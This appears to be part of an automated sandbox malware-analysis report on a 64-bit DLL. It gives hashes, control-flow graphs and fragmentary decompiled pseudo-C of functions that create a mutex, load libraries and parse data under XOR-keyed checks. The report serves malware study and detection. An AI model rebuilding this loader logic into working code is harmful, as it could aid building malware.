                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 44%
                  			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t45;
                  				long long _t46;
                  				long long _t47;
                  				struct _SECURITY_ATTRIBUTES* _t57;
                  				long long _t60;
                  				int _t62;
                  				WCHAR* _t66;
                  				void* _t69;
                  				void* _t76;
                  				void* _t79;
                  
                  				_t47 = __rbx;
                  				_t45 = _t69;
                  				 *((long long*)(_t45 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t45 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (__eax == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t46 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t46;
                  				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
                  				if (_t46 == _t47) goto 0x800087f7;
                  				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t46 == _t47) goto 0x800087c0;
                  				CreateMutexW(_t57, _t62, _t66); // executed
                  				goto 0x800087c3;
                  				_t60 = _t47;
                  				if (_t60 == _t47) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				FindCloseChangeNotification(??); // executed
                  				goto 0x800087e9;
                  				_a24 = _t60;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}

















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
                  • String ID:
                  • API String ID: 4170216436-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 180007b94-180007be5 150 180007da3 149->150 151 180007beb-180007bf3 149->151 152 180007da8-180007db8 150->152 151->150 153 180007bf9-180007c24 RtlAllocateHeap 151->153 154 180007c2a-180007c63 memset 153->154 155 180007d9c-180007da1 153->155 156 180007c69-180007c93 154->156 157 180007d6d-180007d85 154->157 155->152 159 180007c98-180007c9b 156->159 161 180007d87-180007d8a 157->161 162 180007d8c-180007d9a HeapFree 157->162 159->157 160 180007ca1-180007caa 159->160 163 180007cd6-180007ce7 160->163 164 180007cac-180007cd1 call 180008c48 160->164 161->152 162->152 166 180007ce9-180007ced 163->166 167 180007d1d-180007d68 163->167 164->163 169 180007cfa-180007d02 166->169 170 180007cef-180007cf8 166->170 167->159 171 180007d07-180007d0e 169->171 170->171 171->166 172 180007d10-180007d18 171->172 172->167
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 173 180002464-180002482 LoadLibraryA 174 180002484-180002495 call 180007b94 173->174 175 1800024af-1800024b5 GetLastError 173->175 179 1800024a4-1800024ad FreeLibrary 174->179 180 180002497-1800024a2 174->180 176 1800024b7-1800024c8 175->176 179->176 180->176
                  C-Code - Quality: 25%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				long long _t20;
                  				void* _t24;
                  				void* _t31;
                  				void* _t32;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				LoadLibraryA(??); // executed
                  				_t24 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
                  				_t20 = _a24;
                  				 *_t20 = _t24;
                  				 *__rdx = _t20;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}







                  0x180002464
                  0x180002469
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 181 180006dcc-180006e1f call 1800089e4 184 180006e21-180006e36 lstrlenW 181->184 185 180006e8a 181->185 187 180006e38-180006e4d lstrcmpiW 184->187 188 180006e4f-180006e77 call 180002594 184->188 186 180006e8f-180006eaf 185->186 187->188 190 180006e7a-180006e88 HeapFree 187->190 188->190 190->186
                  C-Code - Quality: 67%
                  			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t46;
                  				long long _t48;
                  				intOrPtr* _t63;
                  				long long _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				void* _t74;
                  				WCHAR* _t77;
                  				WCHAR* _t80;
                  
                  				_t48 = __rbx;
                  				_t46 = _t68;
                  				 *((long long*)(_t46 + 8)) = __rbx;
                  				 *((long long*)(_t46 + 0x10)) = _t65;
                  				 *((long long*)(_t46 + 0x18)) = __rsi;
                  				 *((long long*)(_t46 + 0x20)) = __rdi;
                  				_t69 = _t68 - 0x30;
                  				_t63 = __rcx;
                  				_t66 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
                  				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
                  				 *_t66 =  *_t63;
                  				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t77); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
                  				r11d =  *((intOrPtr*)(_t69 + 0x20));
                  				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 192 1ff41c23edc-1ff41c2405d 194 1ff41c2405f-1ff41c24069 192->194 195 1ff41c2402a-1ff41c240ae 192->195 197 1ff41c24004-1ff41c2400f 194->197 198 1ff41c240a0-1ff41c240a8 195->198 199 1ff41c240b0-1ff41c240b8 195->199 200 1ff41c23f96-1ff41c23fae call 1ff41c24d69 197->200 208 1ff41c24045-1ff41c24253 198->208 201 1ff41c24020-1ff41c2409b call 1ff41c24faa 199->201 210 1ff41c23f27-1ff41c23f29 200->210 214 1ff41c24240-1ff41c2424b 208->214 215 1ff41c24255-1ff41c24257 208->215 212 1ff41c23f1a-1ff41c23f22 210->212 213 1ff41c23f2b-1ff41c23f31 210->213 212->210 216 1ff41c23fce-1ff41c23fdb 212->216 213->212 217 1ff41c23f33 213->217 218 1ff41c2423b-1ff41c2423f 215->218 219 1ff41c23f87-1ff41c23f94 216->219 220 1ff41c23fdd-1ff41c23fea 216->220 221 1ff41c23f7a-1ff41c23f85 217->221 219->200 224 1ff41c23f5d-1ff41c23f69 call 1ff41c24929 219->224 222 1ff41c23fc0-1ff41c23fc9 220->222 223 1ff41c23fec-1ff41c24002 220->223 221->219 221->220 222->212 223->197 223->208 228 1ff41c23fb3-1ff41c23fbe 224->228 229 1ff41c23f6b-1ff41c23f75 call 1ff41c24929 224->229 228->229 229->221 232 1ff41c24114-1ff41c24121 229->232 233 1ff41c240f3-1ff41c24100 call 1ff41c25141 232->233 234 1ff41c24123-1ff41c2412f 232->234 233->234 240 1ff41c24102-1ff41c2410f call 1ff41c24e98 233->240 236 1ff41c24131-1ff41c24139 234->236 237 1ff41c240e6-1ff41c240f1 234->237 236->240 241 1ff41c2413b-1ff41c24146 236->241 237->233 238 1ff41c240db-1ff41c240e4 237->238 238->237 242 1ff41c240bd-1ff41c240cc RtlAllocateHeap 238->242 240->232 244 1ff41c24164-1ff41c24175 241->244 242->241 245 1ff41c240ce-1ff41c240d6 242->245 244->218 248 1ff41c241d8-1ff41c241df 245->248 249 1ff41c241e1-1ff41c241ea 248->249 250 1ff41c241ec-1ff41c241f8 248->250 249->250 252 1ff41c24204-1ff41c24213 call 1ff41c24e98 249->252 253 1ff41c24215-1ff41c24220 250->253 254 1ff41c241fa-1ff41c24202 250->254 252->253 257 1ff41c24222-1ff41c2422b call 1ff41c25141 252->257 253->254 253->257 254->252 255 1ff41c241cb-1ff41c241cf 254->255 255->248 257->218 261 1ff41c241be-1ff41c241c9 257->261 261->244
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264994836.000001FF41C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF41C20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1ff41c20000_loaddll64.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: 5568b5defde0d3f082349ed51791747750850e94639b96616ae01ff4a2a09641
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: BF816B31B186468FE6A5DB18C954BFB76E1FF98300FB4547DA18AC33D1C6AC8C868742
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 262 1800025ec-180002607 SleepEx 263 180002609-180002610 262->263 264 18000261b-18000261f 262->264 263->264 265 180002612-180002615 WaitForSingleObject 263->265 265->264
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264994836.000001FF41C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF41C20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1ff41c20000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: ca1e9d5499abb0ef6ae7f196a200784a2e4b45087c3d3663fd45ddc9ded4c5f3
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: B3510030F18646DFE7A5DB5889557FB76D1FF88300FA4293DA286C7390D2B888429783
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  Memory Dump Source
                  • Source File: 00000000.00000002.264994836.000001FF41C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF41C20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1ff41c20000_loaddll64.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: 7ce3d945db2e74cd5f78d42d3e86f908fdbabf9c160391db11a0b8b6c0fdbb12
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: 7A512334F1864A8FE6A7EB98C8547FB76E1FF84300FB4053DA246C3391D7A899429742
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 180008d78-180008dca call 180002370 409 1800090ee 406->409 410 180008dd0-180008df3 406->410 411 1800090f3-18000910c 409->411 412 180008f65 410->412 413 180008df9-180008e1a lstrlenA HeapAlloc 410->413 414 180008f6a-180008f7f HeapFree 412->414 415 1800090e4-1800090e9 413->415 416 180008e20-180008e38 memcpy 413->416 414->411 417 180008f85-180008fa5 call 180002370 414->417 415->414 418 180008e3c-180008e3f 416->418 417->409 424 180008fab-180008fc8 call 1800038f8 417->424 420 180008e41-180008e44 418->420 421 180008e46-180008e49 418->421 420->421 423 180008e4b-180008e4e 420->423 421->418 425 180008ecc 423->425 426 180008e50-180008e79 lstrlenA HeapAlloc 423->426 433 180008fd2-180008ff5 call 180002370 424->433 434 180008fca-180008fcc 424->434 428 180008ece 425->428 426->428 429 180008e7b 426->429 431 180008ed6-180008ed8 428->431 432 180008e7e-180008e85 429->432 435 180008eda-180008f03 call 18000958c 431->435 436 180008f4f-180008f5d HeapFree 431->436 437 180008e87-180008e8a 432->437 438 180008e99 432->438 448 180008ff7-18000902d call 18000958c memcpy 433->448 449 18000905e-180009081 call 180002370 433->449 434->409 434->433 452 180008f05 435->452 453 180008f09-180008f1b LeaveCriticalSection 435->453 436->412 442 180008e95-180008e97 437->442 443 180008e8c-180008e93 437->443 439 180008e9b-180008e9e 438->439 444 180008eb5-180008ec3 439->444 445 180008ea0-180008ea3 439->445 442->438 442->439 443->437 443->442 444->432 451 180008ec5-180008eca 444->451 450 180008ea6-180008ea9 445->450 462 180009043-180009058 LeaveCriticalSection HeapFree 448->462 463 18000902f-18000903e memset 448->463 449->411 464 180009083-180009099 call 1800038f8 449->464 457 180008eab-180008eae 450->457 458 180008eb0-180008eb3 450->458 451->431 452->453 455 180008f1d-180008f38 HeapFree * 2 453->455 456 180008f3e-180008f4d 453->456 455->456 456->414 457->444 457->458 458->450 462->449 463->462 464->411 467 18000909b-1800090a4 464->467 467->411 468 1800090a6-1800090e2 call 18000958c GetSystemTimeAsFileTime LeaveCriticalSection 467->468 468->411
                  C-Code - Quality: 37%
                  			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t77;
                  				void* _t88;
                  				intOrPtr _t91;
                  				void* _t96;
                  				char _t97;
                  				void* _t115;
                  				long long* _t157;
                  				void* _t158;
                  				long long _t160;
                  				char* _t162;
                  				long long _t163;
                  				char* _t178;
                  				char* _t179;
                  				void* _t203;
                  				long long _t204;
                  				void* _t208;
                  				intOrPtr* _t209;
                  				int _t211;
                  				void* _t215;
                  				void* _t216;
                  				void* _t235;
                  				long _t238;
                  				long _t244;
                  				void* _t246;
                  				CHAR* _t253;
                  				long long _t254;
                  
                  				_t235 = _t215;
                  				 *((long long*)(_t235 + 8)) = __rbx;
                  				 *((long long*)(_t235 + 0x10)) = __rdx;
                  				_t216 = _t215 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t209 = __rcx;
                  				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
                  				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t157 =  *_t209;
                  				 *((long long*)(_t216 + 0x98)) = _t157;
                  				 *((long long*)(_t216 + 0x28)) = _t204;
                  				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t253) + 1;
                  				HeapAlloc(_t246, _t244, _t238);
                  				_t254 = _t157;
                  				if (_t157 == 0) goto 0x800090e4;
                  				memcpy(_t203, _t208, _t211);
                  				_t162 = _t254;
                  				if ( *_t162 == 0x20) goto 0x80008e46;
                  				if ( *_t162 != 9) goto 0x80008e4b;
                  				_t163 = _t162 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t163 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t157 + 1; // 0x1
                  				r8d = _t12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t157 == 0) goto 0x80008ece;
                  				_t96 =  *_t163;
                  				if (_t96 == 0) goto 0x80008e99;
                  				if (_t96 == 0x20) goto 0x80008e95;
                  				_t178 = _t163 + 1;
                  				_t97 =  *_t178;
                  				if (_t97 != 0) goto 0x80008e87;
                  				if (_t97 != 0) goto 0x80008e9b;
                  				if (_t178 == 0) goto 0x80008eb5;
                  				 *_t178 = 0;
                  				_t179 = _t178 + 1;
                  				if ( *_t179 == 0x20) goto 0x80008eb0;
                  				if ( *_t179 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t157 = _t163;
                  				_t158 = _t157 + _t204;
                  				if (_t179 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
                  				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
                  				 *((long long*)(_t209 + 0x40)) = _t254;
                  				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
                  				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
                  				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t209 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
                  				_t91 =  *((intOrPtr*)(_t216 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t91 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
                  				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
                  				_t39 = _t158 + 0x10; // 0x10
                  				_t88 = _t39;
                  				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
                  				E0000000118000958C( *_t209 + 0x18);
                  				r8d = _t115;
                  				memcpy(??, ??, ??);
                  				if (_t115 - _t88 >= 0) goto 0x80009043;
                  				r8d = _t88 - _t115;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
                  				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
                  				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t209 + 0x18; // 0x28
                  				E0000000118000958C(_t55);
                  				GetSystemTimeAsFileTime(??);
                  				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t216 + 0x30)) = _t160;
                  				 *((long long*)(_t209 + 0x30)) = _t160;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}





























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
